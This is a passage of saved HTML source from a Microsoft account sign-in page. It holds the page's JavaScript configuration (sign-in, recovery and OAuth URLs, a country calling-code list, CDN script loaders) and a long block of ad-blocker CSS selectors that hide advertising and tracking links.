more</a>",sPOST_NewUser:'',bH:false,bK:true,ao:true,bO:true,urlPost:'https://login.live.com/ppsecure/post.srf?contextid=40813CDF1346DA52&bk=1560391152&uaid=c32114cb67f1490b46720d4d540fe260&pid=0',bV:true,bW:false,ay:0,A:10000,fWebNgcFS:false,B:0,C:{},D:1,sFedQS:'wa=wsignin1.0&wtrealm=uri:WindowsLiveID&wctx=contextid%3D40813CDF1346DA52%26bk%3D1560391152',ba:false,H:'https://signup.live.com/signup?contextid=40813CDF1346DA52&bk=1560391152&ru=https://login.live.com/login.srf%3fcontextid%3d40813CDF1346DA52%26mkt%3dEN-US%26lc%3d1033%26bk%3d1560391152%26uaid%3dc32114cb67f1490b46720d4d540fe260&uiflavor=web&mkt=EN-US&lc=1033&uaid=c32114cb67f1490b46720d4d540fe260',cA:'',bc:false,J:'',bd:true,cC:'',cD:'https://go.microsoft.com/fwlink/?LinkID=254486',K:-1,A1:true,cF:'',M:1033,A3:false,A4:true,bh:false,N:'',A6:true,bj:true,str:[],bk:true,R:0,S:60,bn:false,U:'',X:false,Z:3,bt:false,urlSwitch:'https://login.live.com/logout.srf?contextid=40813CDF1346DA52&uaid=c32114cb67f1490b46720d4d540fe260&ru=https://account.live.com%3fmkt%3dEN-US%26lc%3d1033%26id%3d38936&bk=1560391152&lm=I',AB:'AF~Afghanistan~93!!!AL~Albania~355!!!DZ~Algeria~213!!!AD~Andorra~376!!!AO~Angola~244!!!AQ~Antarctica~672!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Ascension Island~247!!!AU~Australia~61!!!AT~Austria~43!!!AZ~Azerbaijan~994!!!BS~Bahamas~1!!!BH~Bahrain~973!!!BD~Bangladesh~880!!!BB~Barbados~1!!!BY~Belarus~375!!!BE~Belgium~32!!!BZ~Belize~501!!!BJ~Benin~229!!!BM~Bermuda~1!!!BT~Bhutan~975!!!BO~Bolivia~591!!!BQ~Bonaire~599!!!BA~Bosnia and Herzegovina~387!!!BW~Botswana~267!!!BV~Bouvet Island~47!!!BR~Brazil~55!!!IO~British Indian Ocean Territory~44!!!VG~British Virgin Islands~1!!!BN~Brunei~673!!!BG~Bulgaria~359!!!BF~Burkina Faso~226!!!BI~Burundi~257!!!CV~Cabo Verde~238!!!KH~Cambodia~855!!!CM~Cameroon~237!!!CA~Canada~1!!!KY~Cayman Islands~1!!!CF~Central African Republic~236!!!TD~Chad~235!!!CL~Chile~56!!!CN~China~86!!!CX~Christmas Island~61!!!CC~Cocos (Keeling) Islands~61!!!CO~Colombia~57!!!KM~Comoros~269!!!CG~Congo~242!!!CD~Congo (DRC)~243!!!CK~Cook Islands~682!!!CR~Costa Rica~506!!!CI~Côte d\'Ivoire~225!!!HR~Croatia~385!!!CU~Cuba~53!!!CW~Curaçao~599!!!CY~Cyprus~357!!!CZ~Czechia~420!!!DK~Denmark~45!!!DJ~Djibouti~253!!!DM~Dominica~1!!!DO~Dominican Republic~1!!!EC~Ecuador~593!!!EG~Egypt~20!!!SV~El Salvador~503!!!GQ~Equatorial Guinea~240!!!ER~Eritrea~291!!!EE~Estonia~372!!!ET~Ethiopia~251!!!FK~Falkland Islands~500!!!FO~Faroe Islands~298!!!FJ~Fiji~679!!!FI~Finland~358!!!FR~France~33!!!GF~French Guiana~594!!!PF~French Polynesia~689!!!GA~Gabon~241!!!GM~Gambia~220!!!GE~Georgia~995!!!DE~Germany~49!!!GH~Ghana~233!!!GI~Gibraltar~350!!!GR~Greece~30!!!GL~Greenland~299!!!GD~Grenada~1!!!GP~Guadeloupe~590!!!GU~Guam~1!!!GT~Guatemala~502!!!GG~Guernsey~44!!!GN~Guinea~224!!!GW~Guinea-Bissau~245!!!GY~Guyana~592!!!HT~Haiti~509!!!HN~Honduras~504!!!HK~Hong Kong SAR~852!!!HU~Hungary~36!!!IS~Iceland~354!!!IN~India~91!!!ID~Indonesia~62!!!IR~Iran~98!!!IQ~Iraq~964!!!IE~Ireland~353!!!IM~Isle of Man~44!!!IL~Israel~972!!!IT~Italy~39!!!JM~Jamaica~1!!!XJ~Jan Mayen~47!!!JP~Japan~81!!!JE~Jersey~44!!!JO~Jordan~962!!!KZ~Kazakhstan~7!!!KE~Kenya~254!!!KI~Kiribati~686!!!KR~Korea~82!!!XK~Kosovo~383!!!KW~Kuwait~965!!!KG~Kyrgyzstan~996!!!LA~Laos~856!!!LV~Latvia~371!!!LB~Lebanon~961!!!LS~Lesotho~266!!!LR~Liberia~231!!!LY~Libya~218!!!LI~Liechtenstein~423!!!LT~Lithuania~370!!!LU~Luxembourg~352!!!MO~Macao SAR~853!!!MK~North Macedonia~389!!!MG~Madagascar~261!!!MW~Malawi~265!!!MY~Malaysia~60!!!MV~Maldives~960!!!ML~Mali~223!!!MT~Malta~356!!!MH~Marshall Islands~692!!!MQ~Martinique~596!!!MR~Mauritania~222!!!MU~Mauritius~230!!!YT~Mayotte~262!!!MX~Mexico~52!!!FM~Micronesia~691!!!MD~Moldova~373!!!MC~Monaco~377!!!MN~Mongolia~976!!!ME~Montenegro~382!!!MS~Montserrat~1!!!MA~Morocco~212!!!MZ~Mozambique~258!!!MM~Myanmar~95!!!NA~Namibia~264!!!NR~Nauru~674!!!NP~Nepal~977!!!NL~Netherlands~31!!!AN~Netherlands Antilles (Former)~599!!!NC~New Caledonia~687!!!NZ~New Zealand~64!!!NI~Nicaragua~505!!!NE~Niger~227!!!NG~Nigeria~234!!!NU~Niue~683!!!KP~North Korea~850!!!MP~Northern Mariana Islands~1!!!NO~Norway~47!!!OM~Oman~968!!!PK~Pakistan~92!!!PW~Palau~680!!!PS~Palestinian Authority~970!!!PA~Panama~507!!!PG~Papua New Guinea~675!!!PY~Paraguay~595!!!PE~Peru~51!!!PH~Philippines~63!!!PL~Poland~48!!!PT~Portugal~351!!!QA~Qatar~974!!!RE~Réunion~262!!!RO~Romania~40!!!RU~Russia~7!!!RW~Rwanda~250!!!XS~Saba~599!!!KN~Saint Kitts and Nevis~1!!!LC~Saint Lucia~1!!!PM~Saint Pierre and Miquelon~508!!!VC~Saint Vincent and the Grenadines~1!!!WS~Samoa~685!!!SM~San Marino~378!!!ST~São Tomé and Príncipe~239!!!SA~Saudi Arabia~966!!!SN~Senegal~221!!!RS~Serbia~381!!!SC~Seychelles~248!!!SL~Sierra Leone~232!!!SG~Singapore~65!!!XE~Sint Eustatius~599!!!SK~Slovakia~421!!!SI~Slovenia~386!!!SB~Solomon Islands~677!!!SO~Somalia~252!!!ZA~South Africa~27!!!SS~South Sudan~211!!!ES~Spain~34!!!LK~Sri Lanka~94!!!SH~St Helena, Ascension, and Tristan da Cunha~290!!!SD~Sudan~249!!!SR~Suriname~597!!!SJ~Svalbard~47!!!SZ~Swaziland~268!!!SE~Sweden~46!!!CH~Switzerland~41!!!SY~Syria~963!!!TW~Taiwan~886!!!TJ~Tajikistan~992!!!TZ~Tanzania~255!!!TH~Thailand~66!!!TL~Timor-Leste~670!!!TG~Togo~228!!!TK~Tokelau~690!!!TO~Tonga~676!!!TT~Trinidad and Tobago~1!!!TA~Tristan da Cunha~290!!!TN~Tunisia~216!!!TR~Turkey~90!!!TM~Turkmenistan~993!!!TC~Turks and Caicos Islands~1!!!TV~Tuvalu~688!!!UM~U.S. Outlying Islands~1!!!VI~U.S. Virgin Islands~1!!!UG~Uganda~256!!!UA~Ukraine~380!!!AE~United Arab Emirates~971!!!UK~United Kingdom~44!!!US~United States~1!!!UY~Uruguay~598!!!UZ~Uzbekistan~998!!!VU~Vanuatu~678!!!VA~Vatican City~379!!!VE~Venezuela~58!!!VN~Vietnam~84!!!WF~Wallis and Futuna~681!!!YE~Yemen~967!!!ZM~Zambia~260!!!ZW~Zimbabwe~263',AC:'',urlFedConvertRename:'https://account.live.com/security/LoginStage.aspx?lmif=1000&ru=https://login.live.com/login.srf%3Fvv%3D1600%26mkt%3DEN-US%26lc%3D1033%26uaid%3Dc32114cb67f1490b46720d4d540fe260&vv=1600&mkt=EN-US&lc=1033&cbid=0&id=38936&uaid=c32114cb67f1490b46720d4d540fe260',AD:'https://accounts.google.com/o/oauth2/v2/auth?response_type=code&client_id=1057459215779-l3uvdm899ucea09atcc09d9rq6uvkilv.apps.googleusercontent.com&scope=openid+profile+email&redirect_uri=https://login.live.com/HandleGoogleResponse.srf&access_type=offline&state=AECFE736E4446D42',by:false,a:'https://logincdn.msauth.net/16.000.28215.2/',AG:false,b:'',d:false,e:'',f:true,AL:true,g:'',h:false,ca:'',AN:0,i:'c32114cb67f1490b46720d4d540fe260',AO:0,cc:'',AP:'login.live.com',B0:true,AQ:'',l:0,m:'https://github.com/login/oauth/authorize?response_type=code&client_id=e37ffdec11c0245cb2e0&scope=read:user++user:email&redirect_uri=https://login.live.com/HandleGithubResponse.srf&allow_signup=false&state=AECFE736E4446D42',n:'https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fcontextid%3d40813CDF1346DA52%26bk%3d1560391152&id=38936&uiflavor=web&uaid=c32114cb67f1490b46720d4d540fe260&mkt=EN-US&lc=1033&bk=1560391152',B3:true,AU:'',B4:false,sCBUpTxt1:'',p:true,sCBUpTxt2:'',r:1,AX:[],t:'contextid=40813CDF1346DA52&bk=1560391152',B9:false,v:false,w:false,correlationId:'c32114cb67f1490b46720d4d540fe260',oPost:{},z:null,Ab:'',BB:'',Ad:'https://account.live.com/username/recover?wreply=https://login.live.com/login.srf%3flc%3d1033%26mkt%3dEN-US%26contextid%3d40813CDF1346DA52%26bk%3d1560391152%26uaid%3dc32114cb67f1490b46720d4d540fe260&id=38936&mkt=EN-US&lc=1033&uaid=c32114cb67f1490b46720d4d540fe260&uiflavor=web',Ae:'',BF:'',Ag:true,BG:'',BH:'',Aj:false,Al:true,sErrTxt:'',BL:'',An:0,BO:'https://login.live.com/gls.srf?urlID=MSNPrivacyStatement&mkt=EN-US&vv=1600&uaid=c32114cb67f1490b46720d4d540fe260',Aq:'',html:[],iPawnIcon:1,C0:'',sFTTag:'<input type="hidden" name="PPFT" id="i0327" value="DbZKx3pUePoIb10*CoE1qpxFW5Qmp4LHfMx!T5CmsVMWagd!dlMOxoUzGs1eQxbWqwSyQD1cAv13rTyPGtbDKqUdEhC*z2UCoZiL4g!9jxgm9svXxxv4Bm*NtapfBFRvcknSL81IMO0CGV*FefVp*NVJ2o5QkFkOwk1YxwPCO4btQtMPSETpBQe5r6OzU0mfh7UcqQyBttWvjibejbUimImIme7AZV4ENu1c4GPayzRL*axCInKi2666CLLgJDWuRw$$"/>',As:'',C1:'https://sc.imp.live.com/content/dam/imp/surfaces/mail_signin/v3/account/EN-US.html?id=38936&mkt=EN-US',C2:'',At:'',loader:{cdnRoots:[]},C3:'',Au:'',C4:'',C5:'',Aw:'https://login.live.com/Me.htm?v=1&uaid=c32114cb67f1490b46720d4d540fe260',C6:'',BW:2,C7:'',BX:true,BY:true,a0:5,fHasBackgroundColor:false,urlStaySignIn:'https://login.live.com/login.srf?contextid=40813CDF1346DA52&mkt=EN-US&lc=1033&bk=1560391152&uaid=c32114cb67f1490b46720d4d540fe260',CA:1,a5:null,a7:'',CD:{},Be:'16.0.28215.2',a9:'',CE:{'Logo':'','LogoAltText':'','LogoText':'','ShowWLHeader':true},Bf:'',Bg:''};</script><script type="text/javascript">window.UXResourceDependencies = [];</script><script type="text/javascript">(function () {var l = new window.$DepLoader();l.Add("https://logincdn.msauth.net/16.000.28215.2/ConvergedLoginPaginatedStrings","ConvergedLoginPaginatedStrings","sha384-jdbsBfq0v5ir4XFMN4o142QDWnLCpGfG4HUA5d57Co4uxqqKGq+Qj4WFDFuf8jOT");l.Provides("UX_JS_Strings");var res = ("UX_Res_" + window.UXResourceDependencies.length);l.Provides(res);window.UXResourceDependencies.push(res);l.Load();}());</script><script type="text/javascript" src="https://logincdn.msauth.net/16.000.28215.2/ConvergedLoginPaginatedStrings.en" id="ConvergedLoginPaginatedStrings" crossorigin="anonymous" integrity="sha384-jdbsBfq0v5ir4XFMN4o142QDWnLCpGfG4HUA5d57Co4uxqqKGq+Qj4WFDFuf8jOT"></script><script type="text/javascript">(function () {var l = new window.$DepLoader();l.Add("https://logincdn.msauth.net/16.000.28215.2/ConvergedLogin_PCore","ConvergedLogin_PCore","sha384-by4e9gkDYQt3+eICpefvHM9HNNdkX+eWDGkWtnSPP+H7roI1p7Gexn9p8VkRFVBD");l.Requires("UX_JS_Strings");l.Provides("UX_JS_Core");var res = ("UX_Res_" + window.UXResourceDependencies.length);l.Provides(res);window.UXResourceDependencies.push(res);l.Load();}());</script><link rel="prefetch" href="https://logincdn.msauth.net/16.000.28215.2/ConvergedLogin_PCore"><script type="text/javascript">window.WhenAllLoaded = function (callback) { window.$DepLoader.WhenLoaded(window.UXResourceDependencies, callback); };</script><style type="text/css">:root div[aria-label="MessageAdsContainer"], :root div[class^="__Microsoft_Owa_MessageListAds_"], :root .GKJYXHBF2 > .GKJYXHBE2 > .GKJYXHBH5, :root a[href*="mfroute.com/"], :root a[href^="http://ffxitrack.com/"], :root a[href^="http://ad-apac.doubleclick.net/"], :root a[href^="http://www.amazon.co.uk/exec/obidos/external-search?"], :root #\5f _mom_ad_2, :root #rhs_block .mod > .luhb-div > div[data-async-type="updateHotelBookingModule"], :root #\5f _admvnlb_modal_container, :root #MAIN.ShowTopic > .ad, :root a[href^="https://www.arthrozene.com/"][href*="?tid="], :root a[href^="http://pubads.g.doubleclick.net/"], :root .GB3L-QEDGY .GB3L-QEDF- > .GB3L-QEDE-, :root #main_col > #center_col div[style="font-size:14px;margin:0 4px;padding:1px 5px;background:#fff7ed"], :root div[class*="-storyBodyAd-"], :root #center_col > #main > .dfrd > .mnr-c > .c._oc._zs, :root a[href^="http://ul.to/ref/"], :root #\5f _nq__hh[style="display:block!important"], :root a[href^="http://cdn.adstract.com/"], :root a[href^="//tracking.content-recommendation.net/"][href*="/sponsored/click.html?"], :root div[class^="ads-partner-"], :root #\5f _mom_ad_12, :root a[href^="http://lp.ncdownloader.com/"], :root a[href^="https://fileboom.me/pr/"], :root .inlineNewsletterSubscription + .inlineNewsletterSubscription div[class$="_item"], :root .commercial-unit-desktop-rhs > .iKidV > .Ee92ae + .P2mpm + .hp3sk, :root a[href^="//4c7og3qcob.com/"], :root a[href^="http://join3.bannedsextapes.com/track/"], :root div[id^="google_ads_iframe_"], :root #ads > .dose > .dosesingle, :root a[href^="http://3wr110.net/"], :root a[href^="http://bestorican.com/"], :root div[id^="ad_script_"], :root a[href^="http://get.slickvpn.com/"], :root .gbfwa > div[class$="_item"], :root #assetsListings[style="display: block;"], :root #center_col > #\5f Emc, :root a[href^="http://marketgid.com"], :root #rhs_block > ol > .rhsvw > .kp-blk > .xpdopen > ._OKe > ol > ._DJe > .luhb-div, :root AD-SLOT, :root a[href^="http://go.mobisla.com/"], :root a[href^="http://bodelen.com/"], :root a[href^="http://www.webtrackerplus.com/"], :root #center_col > #res > #topstuff + #search > div > #ires > #rso > #flun, :root a[href^="https://watchmygirlfriend.tv/"], :root a[href^="http://www.affbuzzads.com/affiliate/"], :root #center_col > #resultStats + #tads, :root #main-content > [style="padding:10px 0 0 0 !important;"], :root #center_col > #resultStats + #tads + #res + #tads, :root #cnt #center_col > #taw > #tvcap > .c._oc._Lp, :root a[onmousedown^="this.href='http://staffpicks.outbrain.com/network/redir?"][target="_blank"], :root #center_col > #resultStats + div + #res + #tads, :root div[id^="crt-"][style], :root div[class^="Ad__container"], :root a[href^="http://centertrust.xyz/"], :root a[href^="http://g1.v.fwmrm.net/ad/"], :root a[href^="http://www.fbooksluts.com/"], :root #center_col > #resultStats + div[style="border:1px solid #dedede;margin-bottom:11px;padding:5px 7px 5px 6px"], :root a[href^="http://ads.integral-marketing.com/"], :root #resultspanel > #topads, :root a[href^="https://www.firstload.com/affiliate/"], :root a[href^="https://control.trafficfabrik.com/"], :root #center_col > #taw > #tvcap > .commercial-unit-desktop-top, :root a[href^="http://t.mdn2015x1.com/"], :root div[id^="advads_"], :root a[data-obtrack^="http://paid.outbrain.com/network/redir?"], :root .__y_inner > .__y_item, :root div[id^="ads300_100-widget"], :root #center_col > #taw > #tvcap > .rscontainer, :root .commercial-unit-mobile-top .jackpot-main-content-container > .UpgKEd + .nZZLFc > .vci, :root #center_col > div[style="font-size:14px;margin-right:0;min-height:5px"] > div[style="font-size:14px;margin:0 4px;padding:1px 5px;background:#fff8e7"], :root div[id^="MarketGid"], :root a[href^="https://www.financeads.net/tc.php?"], :root #cnt #center_col > #res > #topstuff > .ts, :root a[href^="https://aaucwbe.com/"], :root a[href^="http://espn.zlbu.net/"], :root a[href^="https://ads.trafficpoizon.com/"], :root #content > #center > .dose > .dosesingle, :root #content > #right > .dose > .dosesingle, :root #flowplayer > div[style="position: absolute; width: 300px; height: 275px; left: 222.5px; top: 85px; z-index: 999;"], :root a[href^="http://ads.betfair.com/redirect.aspx?"], :root #flowplayer > div[style="z-index: 208; position: absolute; width: 300px; height: 275px; left: 222.5px; top: 85px;"], :root a[href*="emprestimo.eu"], :root #header + #content > #left > #rlblock_left, :root a[href^="http://9amq5z4y1y.com/"], :root a[href^="https://traffic.bannerator.com/"], :root .__zinit .__y_item, :root a[href^="//40ceexln7929.com/"], :root #mbEnd[cellspacing="0"][cellpadding="0"], :root a[href^="http://banners.victor.com/processing/"], :root #mn #center_col > div > h2.spon:first-child, :root .ch[onclick="ga(this,event)"], :root a[href^="//go.vedohd.org/"], :root #mn #center_col > div > h2.spon:first-child + ol:last-child, :root a[href^="http://affiliate.coral.co.uk/processing/"], :root div[id^="yandex_ad"], :root #mn div[style="position:relative"] > #center_col > ._Ak, :root a[href*=".clksite.com/"], :root #mn div[style="position:relative"] > #center_col > div > ._dPg, :root .__yinit .__y_item, :root a[href^="http://finaljuyu.com/"], :root div[id^="mainads"], :root #rhs_block > .ts[cellspacing="0"][cellpadding="0"][style="padding:0"], :root #rhs_block > #mbEnd, :root a[href^="http://traffic.tc-clicks.com/"], :root #rhs_block .mod > .gws-local-hotels__booking-module, :root #rhs_block .xpdopen > ._OKe > div > .mod > ._yYf, :root a[href^="http://data.ad.yieldmanager.net/"], :root #rhs_block > script + .c._oc._Ve.rhsvw, :root a[data-redirect^="https://paid.outbrain.com/network/redir?"], :root a[href*="deliver.trafficfabrik.com"], :root a[href^="http://track.adform.net/"], :root #tads + div + .c, :root #rhswrapper > #rhssection[border="0"][bgcolor="#ffffff"], :root a[href^="http://admingame.info/"], :root #ssmiwdiv[jsdisplay], :root a[href^="http://www.dealcent.com/register.php?affid="], :root #topstuff > #tads, :root .GFYY1SVD2 > .GFYY1SVC2 > .GFYY1SVF5, :root a[href^="http://www.linkbucks.com/referral/"], :root .GHOFUQ5BG2 > .GHOFUQ5BF2 > .GHOFUQ5BG5, :root .GFYY1SVE2 > .GFYY1SVD2 > .GFYY1SVG5, :root a[href^="https://ad.atdmt.com/"], :root .jobs-information-call-to-action + .jobs-information-call-to-action div[class$="_item"], :root .__ywvr .__y_item, :root a[href^="//00ae8b5a9c1d597.com/"], :root a[href^="http://www.terraclicks.com/"], :root a[href*=".qertewrt.com/"], :root .GJJKPX2N1 > .GJJKPX2M1 > .GJJKPX2P4, :root a[href^="http://s5prou7ulr.com/"], :root .GPMV2XEDA2 > .GPMV2XEDP1 > .GPMV2XEDJBB, :root a[href^="http://4c7og3qcob.com/"], :root a[href^="http://aff.ironsocket.com/"], :root .Mpopup + #Mad > #MadZone, :root aside[itemtype="https://schema.org/WPAdBlock"], :root .__y_elastic .__y_item, :root a[href^="http://www.adxpansion.com"], :root a[href^="http://trk.mdrtrck.com/"], :root .__ywl .__y_item, :root .l-container > #fishtank, :root a[href^="https://a.adtng.com/"], :root .icons-rss-feed + .icons-rss-feed div[class$="_item"], :root a[href^="http://dethao.com/"], :root .lads[width="100%"][style="background:#FFF8DD"], :root iframe[src^="http://cdn2.adexprt.com/"], :root a[href^="https://retiremely.com/"], :root .mod > ._jH + .rscontainer, :root .mw > #rcnt > #center_col > #taw > #tvcap > .c, :root a[href^="http://clicks.binarypromos.com/"], :root .mw > #rcnt > #center_col > #taw > .c, :root .nrelate .nr_partner, :root a[href^="http://tezfiles.com/pr/"], :root [lazy-ad="leftbottom_banner"], :root .ob_container .item-container-obpd, :root a[href^="http://partner.sbaffiliates.com/"], :root a[href^="http://www.firstload.com/affiliate/"], :root a[href^="http://www.myfreepaysite.com/sfw_int.php?aid"], :root a[href^="//srv.buysellads.com/"], :root a[href^="http://click.payserve.com/"], :root a[href^="http://pwrads.net/"], :root .ob_dual_right > .ob_ads_header ~ .odb_div, :root .plistaList > .itemLinkPET, :root a[href^="http://www.download-provider.org/"], :root a[href^="//88d7b6aa44fb8eb.com/"], :root .plistaList > .plista_widget_underArticle_item[data-type="pet"], :root a[href^="http://www.pinkvisualgames.com/?revid="], :root .plista_widget_belowArticleRelaunch_item[data-type="pet"], :root .ra[align="left"][width="30%"], :root a[href^="http://ads.affbuzzads.com/"], :root a[href^="http://promos.bwin.com/"], :root a[href^="http://tracker.mybroadband.co.za/"], :root .ra[align="right"][width="30%"], :root a[href^="http://bs.serving-sys.com/"], :root a[href^="http://api.content.ad/"], :root a[href^="https://www.googleadservices.com/pagead/aclk?"], :root .ra[width="30%"][align="right"] + table[width="70%"][cellpadding="0"], :root a[href^="http://n217adserv.com/"], :root .rc-cta[data-target], :root .rhsvw[style="background-color:#fff;margin:0 0 14px;padding-bottom:1px;padding-top:1px;"], :root a[href^="https://land.rk.com/landing/"], :root .rscontainer > .ellip, :root a[href^="http://refpaano.host/"], :root .widget-pane-section-result[data-result-ad-type], :root a[href^="http://adserver.adtechus.com/"], :root .section-result[data-result-ad-type], :root .trc_rbox .syndicatedItem, :root .trc_rbox_border_elm .syndicatedItem, :root a[href^="http://taboola-"][href*="/redirect.php?app.type="], :root a[href^="https://topoffers.com/"][href*="/?pid="], :root .trc_rbox_div .syndicatedItem, :root .trc_rbox_div .syndicatedItemUB, :root div[id^="div_openx_ad_"], :root .trc_rbox_div a[target="_blank"][href^="http://tab"], :root a[href*=".irtyc.com/"], :root a[href^="//porngames.adult/?SID="], :root a[href^="http://engine.newsmaxfeednetwork.com/"], :root a[href^="https://www.camsoda.com/enter.php?id="], :root a[href*="=exoclick"], :root a[href^="//zenhppyad.com/"], :root a[href^="http://ddownload39.club/"], :root .trc_related_container div[data-item-syndicated="true"], :root .vi-lb-placeholder[title="ADVERTISEMENT"], :root a[href^="http://landingpagegenius.com/"], :root a[href^="//api.ad-goi.com/"], :root a[href^="https://dcs.adgear.com/clicks/"], :root a[href^="http://refer.webhostingbuzz.com/"], :root AD-TRIPLE-BOX, :root ADS-RIGHT, :root a[href^="http://campaign.bharatmatrimony.com/track/"], :root a[href*="/adServe/banners?"], :root AFS-AD, :root a[onmousedown^="this.href='http://paid.outbrain.com/network/redir?"][target="_blank"], :root AMP-AD, :root [onclick^="window.open('window.open('//delivery.trafficfabrik.com/"], :root DFP-AD, :root FBS-AD, :root a[href^="http://clickandjoinyourgirl.com/"], :root div[id^="advads-"], :root a[href^="http://buysellads.com/"], :root LEADERBOARD-AD, :root a[href^="http://sharesuper.info/"], :root [ad-id^="googlead"], :root [href*="//xml.revrtb.com/"], :root a[href^="https://djtcollectorclub.org/"][href*="?affiliate_id="], :root a[href^="http://rekoverr.com/"], :root [href^="https://maskip.co/"], :root [id*="MGWrap"], :root a[href^="//ads.ad-center.com/"], :root a[href^="http://websitedhoome.com/"], :root [id*="MarketGid"], :root a[href^="https://www.pornhat.com/"][rel="nofollow"], :root [id*="ScriptRoot"], :root a[href^="http://secure.cbdpure.com/aff/"], :root a[href^="http://www.seekbang.com/cs/"], :root [id^="bunyad_ads_"], :root [lazy-ad="leftthin_banner"], :root a[onmousedown^="this.href='http://staffpicks.outbrain.com/network/redir?"][target="_blank"] + .ob_source, :root a[href^="http://games.ucoz.ru/"][target="_blank"], :root [lazy-ad="lefttop_banner"], :root [lazy-ad="top_banner"], :root [onclick*="content.ad/"], :root a[href^="http://see-work.info/"], :root a[href^="http://www.graboid.com/affiliates/"], :root a[href^="http://papi.mynativeplatform.com:80/pub2/"], :root [onclick^="window.open('http://adultfriendfinder.com/search/"], :root a[href^="http://www.ducksnetwork.com/"], :root [onclick^="window.open('https://www.brazzersnetwork.com/landing/"], :root a[href^="http://www.bet365.com/"][href*="?affiliate="], :root [src^="/Redirect.a2b?"], :root a[data-oburl^="http://paid.outbrain.com/network/redir?"], :root a[data-oburl^="https://paid.outbrain.com/network/redir?"], :root a[data-redirect^="http://click.plista.com/pets"], :root a[data-redirect^="http://paid.outbrain.com/network/redir?"], :root a[href^="http://go.ad2up.com/"], :root a[href^="http://adtransfer.net/"], :root a[href^="http://adclick.g.doubleclick.net/"], :root a[data-redirect^="this.href='http://paid.outbrain.com/network/redir?"], :root div[class*="_AdInArticle_"], :root a[href^="https://track.clickmoi.xyz/"], :root a[data-url^="http://paid.outbrain.com/network/redir?"], :root a[data-url^="http://paid.outbrain.com/network/redir?"] + .author, :root a[href^="http://ad.yieldmanager.com/"], :root a[href^="http://www.myfreepaysite.com/sfw.php?aid"], :root a[href^="//4f6b2af479d337cf.com/"], :root a[href^="http://lp.ezdownloadpro.info/"], :root a[data-widget-outbrain-redirect^="http://paid.outbrain.com/network/redir?"], :root a[href$="/vghd.shtml"], :root a[href^="http://amzn.to/"] > img[src^="data"], :root a[href*=".adk2x.com/"], :root a[href^="//z6naousb.com/"], :root a[href^="//5e1fcb75b6d662d.com/"], :root a[href*=".adsrv.eacdn.com/"] > img, :root a[href^="//www.mgid.com/"], :root a[href^="http://www.clkads.com/adServe/"], :root a[href^="http://ad.doubleclick.net/"], :root a[href*=".allsports4you.club"], :root a[href^="http://googleads.g.doubleclick.net/pcs/click"], :root a[href^="https://uncensored.game/"], :root a[href*=".approvallamp.club/"], :root a[href^="http://connectlinking6.com/"], :root div[id^="ad-position-"], :root a[href*=".bang.com/"][href*="&aff="], :root a[href*=".clkcln.com/"], :root a[href^="http://guideways.info/"], :root a[href*=".ichlnk.com/"], :root div[class^="largeRectangleAd_"], :root a[href*=".inclk.com/"], :root a[href*=".intab.fun/"], :root a[href^="//awejmp.com/"], :root a[href*=".revimedia.com/"], :root a[href*=".trust.zone"], :root a[href*="//xml.revrtb.com/"], :root a[href^="http://www.1clickmoviedownloader.info/"], :root a[href^="https://www.friendlyduck.com/AF_"], :root a[href^="http://feeds1.validclick.com/"], :root a[href*="//3wr110.xyz/"], :root a[href^="http://eclkmpsa.com/"], :root a[href*="//ridingintractable.com/"], :root a[href^="http://www.coinducks.com/"], :root div[id^="dfp-ad-"], :root a[href*="/adrotate-out.php?"], :root a[href^="https://servedbyadbutler.com/"], :root a[href*="/cmd.php?ad="], :root a[href*="/servlet/click/zone?"], :root a[href*="5iclx7wa4q.com"], :root a[href^="http://feedads.g.doubleclick.net/"], :root a[href*="=Adtracker"], :root a[href^="http://www.downloadweb.org/"], :root a[href^="http://affiliates.score-affiliates.com/"], :root a[href*="=adscript"], :root div > [class][onclick*=".updateAnalyticsEvents"], :root a[href*="?adlivk="][href*="&refer="], :root a[href^="http://www.afco2go.com/srv.php?"], :root a[onmousedown^="this.href='https://paid.outbrain.com/network/redir?"][target="_blank"] + .ob_source, :root a[href^="http://betahit.click/"], :root a[href^="http://hyperies.info/"], :root iframe[id^="google_ads_frame"], :root a[href*="a2g-secure.com"], :root a[href*="ad2upapp.com/"], :root a[href*="delivery.trafficfabrik.com"], :root a[href^="https://members.linkifier.com/public/affiliateLanding?refCode="], :root a[href^="//www.pd-news.com/"], :root a[href*="googleme.eu"], :root a[href*="letsadvertisetogether.com"], :root a[href^="http://bonusfapturbo.nmvsite.com/"], :root a[href^="http://www.streamtunerhd.com/signup?"], :root a[href*="onclkds."], :root a[href^="https://badoinkvr.com/"], :root a[href*="pussl3.com"], :root a[href^="https://iactrivago.ampxdirect.com/"], :root a[href^=" http://ads.ad-center.com/"], :root a[href^=" http://n47adshostnet.com/"], :root div[id^="ads300_250-widget"], :root a[href^=" http://www.sex.com/"][href*="&utm_"], :root a[href^="//adbit.co/?a=Advertise&"], :root a[href^="http://secure.signup-way.com/"], :root a[href^="//bwnjijl7w.com/"], :root a[href^="//db52cc91beabf7e8.com/"], :root a[href^="http://tracking.deltamediallc.com/"], :root a[href^="//go.onclasrv.com/"], :root a[href^="//healthaffiliate.center/"], :root a[href^="http://www.revenuehits.com/"], :root a[href^="//jsmptjmp.com/"], :root a[href^="//look.djfiln.com/"], :root a[href^="//medleyads.com/spot/"], :root a[href^="http://onclickads.net/"], :root a[href^="//nlkdom.com/"], :root a[href^="http://www.streamate.com/exports/"], :root a[href^="http://click.plista.com/pets"], :root a[href^="//t.MtagMonetizationA.com/"], :root a[href^="http://spygasm.com/track?"], :root a[href^="//voyeurhit.com/cs/"], :root a[href^="http://1phads.com/"], :root div[id^="ads250_250-widget"], :root a[href^="http://2pxg8bcf.top/"], :root a[href^="http://www.clickansave.net/"], :root a[href^="http://360ads.go2cloud.org/"], :root a[href^="http://paid.outbrain.com/network/redir?"], :root a[href^="http://track.affiliatenetwork.co.za/"], :root a[href^="http://45eijvhgj2.com/"], :root a[href^="http://6kup12tgxx.com/"], :root a[href^="http://9nl.es/"], :root a[href^="http://NowDownloadAll.com"], :root a[href^="http://www.sex.com/videos/?utm_"], :root a[href^="http://www.mysuperpharm.com/"], :root a[href^="http://a.adquantix.com/"], :root a[href^="http://a63t9o1azf.com/"], :root a[href^="http://abc2.mobile-10.com/"], :root a[href^="http://ad-emea.doubleclick.net/"], :root a[href^="http://ad.au.doubleclick.net/"], :root a[href^="http://vo2.qrlsx.com/"], :root a[href^="http://adexprt.me/"], :root a[href^="http://adf.ly/?id="], 